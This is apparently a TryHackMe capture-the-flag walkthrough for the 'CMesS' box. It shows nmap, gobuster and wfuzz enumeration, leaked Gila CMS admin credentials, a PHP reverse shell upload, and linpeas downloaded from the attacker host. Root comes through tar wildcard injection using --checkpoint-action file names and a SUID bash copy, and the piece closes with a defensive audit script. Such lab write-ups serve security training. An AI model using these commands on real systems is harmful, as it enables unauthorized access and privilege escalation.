CMesS — TryHackMe

This is a really great medium-level box. It involves enumerating subdomains and discovering sensitive information on the dev subdomain, including the email and password of the Gila CMS admin user. With these credentials we can log in via /login, and once inside we have the ability to upload a PHP reverse shell, which gives us a foothold on the system. From there we located the user's password in a backup file under /opt. Further system enumeration let us elevate our privileges and root the box using tar wildcard injection.

Enumeration:

First we run an initial Nmap scan over all ports on the target machine.

sudo nmap -p- --min-rate=5000 -oG CMess -vv 10.10.204.141

Searching the CMess output file for the ports that are open:

grep -oP '([\d]+/open)' CMess | awk -F / '{ print $1 }' | tr '\n' ','

The scan found two open ports: 22 (SSH) and 80 (HTTP). The command above is pretty useful when there are a lot of open ports on the target machine.

$ nmap -sVC -p "22,80" -T4 10.10.204.141
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-05 17:09 EST
Nmap scan report for 10.10.204.141
Host is up (0.11s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9b652d3939a3850b4233bfd210c051f (RSA)
|   256 21c36e318b85228a6d72868fae64662b (ECDSA)
|_  256 5bb9757805d7ec43309617ffc6a86ced (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Gila CMS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds

Adding the domain name to the /etc/hosts file:

$ echo "10.10.204.141 cmess.thm" | sudo tee -a /etc/hosts
[sudo] password for user: 
10.10.204.141 cmess.thm

Navigating to the website we can see it's Gila CMS, an open-source content management system. We can check whether there are known public vulnerabilities for it.

I used the searchsploit tool and also did a Google search.

We found several vulnerabilities, but none of them are going to work here: an XSS can't get us a shell on the machine since there is no user interaction, the LFI and SQLi vulnerabilities require admin authentication, for which we don't have credentials, and lastly the RCE didn't work.

Consequently we ran gobuster to check for directories and files on the target.

gobuster dir -u http://cmess.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We got tons of webpages, most of them useless except /login and /admin, but we need credentials in order to log in as an admin or a user.

Next we're going to enumerate subdomains.

wfuzz -c -w top1million.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" --hl 107
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://cmess.thm/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                      
=====================================================================

000000019:   200        30 L     104 W      934 Ch      "dev"

Adding the subdomain to the /etc/hosts file as well.

echo "10.10.69.214 dev.cmess.thm" | sudo tee -a /etc/hosts

This exposed the development log, which contains sensitive information. We tried to log in to SSH with the password but it didn't work; instead we used these credentials to log in as admin via /admin, and it works.

The credentials that we used:
andre@cmess.thm KPFTN_f2yxe%

Now we're in the dashboard. There's a lot going on here, so we can start testing things.

Foothold

Go to Content, then File Manager. As you can observe, we have the ability to upload files to the server, which gives us the chance to upload a PHP reverse shell and get RCE on the server.

Before we do that we need to make some adjustments to the reverse shell. If you're using ParrotOS the file is found at /usr/share/webshells/php/php-reverse-shell.php.

Then upload the PHP file. Once it's uploaded, navigate to the assets folder and trigger the reverse shell by clicking on the file you uploaded.

Make sure you have a listener up and running!
Boom, we got a shell on the box, and we can get the user flag.

For more comfortable interaction with the terminal it's better to upgrade (stabilize) the shell, so you can use the basics the terminal supports, like Ctrl+C, the clear command, or navigating with the arrow keys.

The upgrade accomplishes two things: first it turns off our own terminal's echo (which gives us tab autocompletion, the arrow keys, and Ctrl+C to kill processes), then it foregrounds the shell.

The last step gives us access to terminal commands such as clear.

Privilege Escalation:

So far this is one of the most challenging privescs I have encountered; it required good enumeration to get done. It's kind of tricky to perform. Before we go ahead, we first need to download linpeas onto the target machine.

www-data@cmess:/tmp$ wget http://10.11.46.4:8000/linpeas.sh -O linpeas.sh
--2023-12-08 21:53:06--  http://10.11.46.4:8000/linpeas.sh
Connecting to 10.11.46.4:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847773 (828K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 827.90K  94.2KB/s    in 6.0s    

2023-12-08 21:53:12 (137 KB/s) - 'linpeas.sh' saved [847773/847773]

www-data@cmess:/tmp$ chmod +x linpeas.sh
www-data@cmess:/tmp$ ./linpeas.sh

Running linpeas we discovered a password hidden in the /opt directory in the file .password.bak, which we then tried against the andre user. Linpeas also highlighted a cron job, which we'll go after afterwards.

As you can see, the password is 'UQfsdCB7aAP6'. We ran an awk command to filter the user information stored in /etc/passwd and identified a user named andre, indicating that the recently discovered password may belong to him.

Indeed, we successfully compromised his account, and the user flag is stored in the user.txt file.

If you ran linpeas you'll immediately see a cron job highlighted in red: it schedules a tar command to run every two minutes as root, backing up all files and directories in the backup directory to the /tmp folder.

andre@cmess:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *

There's a command injection through the wildcard: tar runs as root, and the shell expands * into the file names in the directory, so any file name that looks like a tar option is parsed as an option. This lets us pass our script (a reverse shell or any other file we have created) to tar as a command to run as root, which presumably gives us a shell we can interact with. We can leverage this using the following options.

If you check the manual page for tar you'll see the following:

--checkpoint[=N] Display progress messages every Nth record (default 10).
--checkpoint-action=ACTION Run ACTION on each checkpoint.

These options allow us to run the file we created: --checkpoint-action=ACTION will be picked up as an option by the tar command when cron runs it at the scheduled time.

andre@cmess:/tmp$ cd /home/andre/backup
andre@cmess:~/backup$ cat note 
Note to self.
Anything in here will be backed up! 
andre@cmess:~/backup$ echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash" > shell.sh 
andre@cmess:~/backup$ chmod +x shell.sh 
andre@cmess:~/backup$ touch /home/andre/backup/--checkpoint=1
andre@cmess:~/backup$ touch /home/andre/backup/--checkpoint-action=exec=sh\ shell.sh

Wait about two minutes, then check the /tmp folder; you will eventually get a root shell.
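From the defensive side, as an added example that is not part of the original writeup: a POSIX shell script that audits a directory backed up by a root cron job for the option-looking file names this technique relies on, and the hardened form of the cron job's tar invocation (archiving `.` relative to the source directory with `-C` instead of expanding `*`), so that file names never reach tar's option parser. The directory names and file names used are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit a backup directory
# for file names that would be parsed as tar options when the shell expands
# '*', and show a hardened replacement for
#   cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *

# Print every entry whose name starts with '-' (including dotfiles).
# Returns 1 if at least one such entry exists, 0 if the directory is clean.
check_dash_names() {
    dir="$1"
    found=0
    for f in "$dir"/* "$dir"/.[!.]*; do
        [ -e "$f" ] || continue          # skip unmatched glob patterns
        name=$(basename -- "$f")
        case "$name" in
            -*) printf 'suspicious entry: %s\n' "$f"; found=1 ;;
        esac
    done
    return $found
}

# Hardened backup: archive '.' from inside the source directory. Member
# names become './--checkpoint=1' etc. and are stored as data; tar never
# sees them on its command line, so no option can be smuggled in.
safe_backup() {
    src="$1"
    dest="$2"
    tar -zcf "$dest" -C "$src" .
}
```

Swapping the cron job's command for `tar -zcf /tmp/andre_backup.tar.gz -C /home/andre/backup .` removes the wildcard expansion entirely; the audit function is useful for spotting directories where such entries have already been planted.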